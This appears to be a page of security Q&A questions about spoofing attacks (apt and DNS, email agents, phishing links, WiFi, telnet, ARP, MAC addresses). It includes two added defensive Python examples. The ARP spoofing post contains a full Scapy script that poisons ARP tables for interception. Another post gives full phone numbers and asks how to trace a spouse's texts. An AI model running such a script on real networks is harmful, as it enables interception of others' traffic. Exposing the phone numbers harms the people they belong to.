Is apt-get secure against DNS Spoofing?

I am aware that installing and updating packages through apt-get should be fairly secure because an attacker supposedly should not be able to interfere or inject packets into the downloads as well as because the packages are signed, with the checksums being verified before(?) the installation.

Consider the case of an attacker performing a man-in-the-middle attack on an apt-get command. If the attacker caused a DNS cache poisoning and redirected the downloads to a server he controls, especially since the downloads are requested using HTTP only, couldn’t the attacker cause the system to download a compromised version of the Release and Packages files, and then push compromised versions of packages to the system? Wouldn’t that then look all correct to apt-get which could then go on to install a compromised package?

Can the attacker not make a mirror of an official repository, compromise some of the packages, say only the firefox or tor packages, modify the Release and Packages file accordingly with the new checksums/hashes then redirect through DNS spoofing the system to download these?

I’m limiting the discussion to downloads from official repositories only.
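
The scenario in this question, modelled as an added example that is not part of the original post: apt checks a signature on the Release file against its trusted keyring, Release lists the hash of Packages, and Packages lists the hash of each .deb. An HMAC stands in here for the OpenPGP signature, and the key names and file contents are constructed for illustration.

```python
import hashlib
import hmac

# Assumption: an HMAC key stands in for the archive's OpenPGP signing key.
# Real apt verifies an asymmetric signature against its trusted keyring.
ARCHIVE_KEY = b"constructed-archive-signing-key"

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def sign(key: bytes, data: bytes) -> str:
    return hmac.new(key, data, hashlib.sha256).hexdigest()

def build_mirror(deb: bytes, key: bytes) -> dict:
    """Build the three-level index: Release -> Packages -> .deb."""
    packages = f"Package: firefox\nSHA256: {sha256(deb)}\n".encode()
    release = f"SHA256:\n {sha256(packages)} main/binary-amd64/Packages\n".encode()
    return {"deb": deb, "Packages": packages, "Release": release,
            "Release.sig": sign(key, release)}

def verify_download(mirror: dict, trusted_key: bytes) -> str:
    """Check each link of the chain, starting from the signed Release file."""
    expected_sig = sign(trusted_key, mirror["Release"])
    if not hmac.compare_digest(expected_sig, mirror["Release.sig"]):
        return "reject: Release signature not made by a trusted key"
    if sha256(mirror["Packages"]) not in mirror["Release"].decode():
        return "reject: Packages does not match hash in Release"
    if sha256(mirror["deb"]) not in mirror["Packages"].decode():
        return "reject: .deb does not match hash in Packages"
    return "accept"

# Constructed sample mirrors.
official = build_mirror(b"genuine firefox build", ARCHIVE_KEY)
# Spoofed mirror: every index recomputed consistently, but without the archive key.
spoofed = build_mirror(b"trojaned firefox build", b"attacker-key")
# Mirror that replays the genuine signed indexes and swaps only the .deb.
swapped = dict(official, deb=b"trojaned firefox build")

if __name__ == "__main__":
    for name, mirror in [("official", official), ("spoofed", spoofed), ("swapped", swapped)]:
        print(name, "->", verify_download(mirror, ARCHIVE_KEY))
```
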

What prevents malicious servers from spoofing mail transfer agents and/or mail delivery agents?

An email system typically consists of multiple agents:

  • Mail user agent (MUA)
  • Mail submission agent (MSA)
  • Mail transfer agent (MTA)
  • Mail delivery agent (MDA)

Mail agent network

Evidently the ‘middlemen’ of this system are a spoofing risk. (Technically the endpoints could also be a spoof risk, but let’s assume in this case that the end users are genuine.)

What methods are used/can be used to protect against these ‘middlemen’ agents being spoofed?

I’ve thought about it myself and the only answer I can come up with is that DNS might provide some sort of limited authentication, though DNS spoofing would still be a risk.


(Image is CC BY-SA 3.0, © Ale2006-from-en.)

How does someone know I clicked a link in an email? URL spoofing? JSON?

Hi, HTML and cybersecurity noob here.

My question is how do hackers/scammers know that I clicked a link? Why is my personal info in the URL redirect link? Is this info then being stored in a database and the hacker/scammer knows that because this specific link was clicked it must have been me?

I received a dodgy email with a link and was curious. So I activated my VPN and checked the link first on VirusTotal and Dr.Web. I found out that the link redirected several times to different websites.

I have changed the link numbers and letters, but the domain is how I received it, as you see below.

The original link sent to me looked like:

http://gallery.divinerosestore.com/SOME_LETTERS_AND_NUMBERS 

What freaked me out was that the second redirect URL contained my email address in the URL link. It was in a weird format separated by commas (,). The link below is not real but is in a format as such:

hdating.us/?s=77auyfdgaukgfdsukg&ed=icl&i= admin77,83907,MY_EMAIL_ADDRESS@service.com,&ts=489234987459 

How I imagine this works is that this information of my email address is being passed on to user “admin77”, stored in his database/text file/whatever, and he knows that I have clicked his link and he now knows I am susceptible to clicking links and a future target?

I would like to inform myself more about cybersecurity and find out more about the details. Any help would be greatly appresh <3
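
A way to inspect a link like the one in this post without opening it, as an added example that is not part of the original post: it parses the query string, reports any parameter whose comma-separated fields contain an email address, and redacts the address before the URL is shared. The function names are hypothetical and the sample is the post's own placeholder link.

```python
import re
from urllib.parse import urlsplit, parse_qsl

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def find_recipient_identifiers(url: str) -> list[dict]:
    """Return the query parameters that carry an email address, split into fields."""
    if "://" not in url:
        url = "http://" + url  # urlsplit needs a scheme to recognise the host
    parts = urlsplit(url)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # The tracking value in the post is a comma-separated record.
        fields = [f.strip() for f in value.split(",") if f.strip()]
        emails = [f for f in fields if EMAIL_RE.fullmatch(f)]
        if emails:
            findings.append({
                "host": parts.hostname,
                "param": name,
                "emails": emails,
                "other_fields": [f for f in fields if f not in emails],
            })
    return findings

def redact(url: str) -> str:
    """Replace embedded addresses so a shared URL no longer identifies the recipient."""
    return EMAIL_RE.sub("REDACTED@example.invalid", url)

# The post's placeholder link (not a real URL, per the poster).
SAMPLE = ("hdating.us/?s=77auyfdgaukgfdsukg&ed=icl"
          "&i=admin77,83907,MY_EMAIL_ADDRESS@service.com,&ts=489234987459")

if __name__ == "__main__":
    for finding in find_recipient_identifiers(SAMPLE):
        print(finding)
    print(redact(SAMPLE))
```
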

WiFi security against spoofing attacks

So I am about to install some custom pi cameras that connect to my network via WiFi. I know ppl hack wifi through spoofing ssid. My password is randomly generated and is impossible to brute force even without router protection and a supercomputer. Spoofing on the other hand could reveal my password. Auto connect is disabled. How can I protect my wifi network? Should I use some certificate? Replace my router with a specific secure model?

What are the correct network settings for VirtualBox VMs to allow DNS spoofing attack [on hold]

I need to implement a DNS spoofing attack using VMs. My host network is connected to a wireless network.

I created one Kali Linux machine (the attacker machine) and another Win10 machine (the victim machine).

I need the victim machine to be able to connect to the Internet as well as be reachable to the attacker.

Can anyone help me please with the right network configurations to enable this attack?

The attacker needs the Default Gateway and the victim’s IP. How to get the DG address?

If I set up the VMs’ network settings as NAT, ettercap cannot see them when I sniff the network.

If I set up my VMs with host-only network settings, they see each other but they are in a different subnet than the actual Gateway and hence can not connect to the Internet.

Can you please provide the correct network settings to implement DNS spoofing in VMs environment and a host device connected to Wireless network?

Virtual SIM text spoofing

I recently caught my wife cheating with a co-worker and exchanging multiple text messages (over 3,000 in one month) to a specific number. After I confronted her, I don’t see the number coming up any more, however, a new suspicious number has appeared. When I try calling this number I get a message that the number is “not in service”. If I do a reverse number look-up there is no user information for this number (630-793-6074). The previous number was 630-540-6964. Is there any way to find out if these numbers are linked to the same sender? P.S. is there any way to recover the content of these texts?

Can telnet session be compromised via IP spoofing? [duplicate]

This question already has an answer here:

  • How does IP address spoofing on the Internet work? Who can do it? 4 answers

The scenario is following:

  1. A telnet server which has ACL implemented for telnet connections.
  2. A hacker spoofs IP and tries to connect to the telnet server.

Consider that the hacker knows the password. Will he/she be able to spoof the IP and establish a telnet connection over the internet successfully?

What will be the outcome if the actual IP holder is active when the hacker is performing this attack?

I would like to know what will be the case on every layer of the OSI model in any possible outcome.

Not able to load website after ARP Spoofing

I have created an ARP spoofing program using Python + Scapy. When I run this script with the target IP and gateway IP, I was able to poison the victim’s ARP table. But I cannot load any website on the victim’s computer. I have enabled IP forwarding on the attacker computer:

echo 1 > /proc/sys/net/ipv4/ip_forward 

I used Wireshark too to see any incoming data, but no luck.

Attacker Computer – I am using Ubuntu 19.04 as the attacker computer.

Victim Computer – I have created a Virtual Machine (Windows 10) on my attacker Computer, with a bridged network.

Below is the code I am using for ARP Spoofing.

    import scapy.all as scapy
    import time
    import optparse
    import sys

    def get_arguments():
        parser = optparse.OptionParser()
        parser.add_option("-t","--target",dest="target",help="Target IP/ Ip Range.")
        parser.add_option("-g","--gateway",dest="gateway",help="Gateway IP.")
        (options,arguments) = parser.parse_args()
        return options

    def get_mac(ip):
        arp_request = scapy.ARP(pdst = ip)
        broadcast =  scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
        arp_request_broadcast = broadcast/arp_request
        answered_list = scapy.srp(arp_request_broadcast, timeout=1,verbose=False)[0]
        return answered_list[0][1].hwsrc

    def spoof(target_ip, spoof_ip):
        target_mac = get_mac(target_ip)
        package = scapy.ARP(op=2,pdst=target_ip,hwdst=target_mac,psrc=spoof_ip)
        scapy.send(package,verbose=False)

    def restore(destination_ip, source_ip):
        destination_mac = get_mac(destination_ip)
        source_mac = get_mac(source_ip)
        package = scapy.ARP(op=2,pdst=destination_ip,hwdst=destination_mac,psrc=source_ip,hwsrc=source_mac)
        scapy.send(package,verbose=False, count=4)

    options = get_arguments()
    target_ip = options.target
    gateway_ip = options.gateway

    if(target_ip == None or gateway_ip==None):
        print("[-] Use --help for more information.")
        sys.exit()

    try:
        packet_send_count = 0
        while True:
            spoof(target_ip,gateway_ip)
            spoof(gateway_ip,target_ip)
            packet_send_count += 2
            print("\r[+] Packet Send : " + str(packet_send_count),end="")
            time.sleep(1)

    except KeyboardInterrupt:
        print("\n\r[-] Quitting.... Restoring ARP Tables---")
        restore(target_ip,gateway_ip)
        restore(gateway_ip,target_ip)

Alternative driver for Intel Wireless-AC 3165 to allow mac spoofing

Intel has stopped supporting mac spoofing in their wifi drivers. Are there any open source drivers that allow mac spoofing on Intel Wireless-AC 3165?

Ubuntu 18.04.1

    description: Wireless interface
    product: Wireless 3165
    vendor: Intel Corporation
    physical id: 0
    bus info: pci@0000:05:00.0
    logical name: wlp5s0
    version: 79
    serial: 08:d4:0c:73:21:3e
    width: 64 bits
    clock: 33MHz
    capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
    configuration: broadcast=yes driver=iwlwifi driverversion=4.18.0-21-generic firmware=29.1044073957.0 ip=192.168.44.244 latency=0 link=yes multicast=yes wireless=IEEE 802.11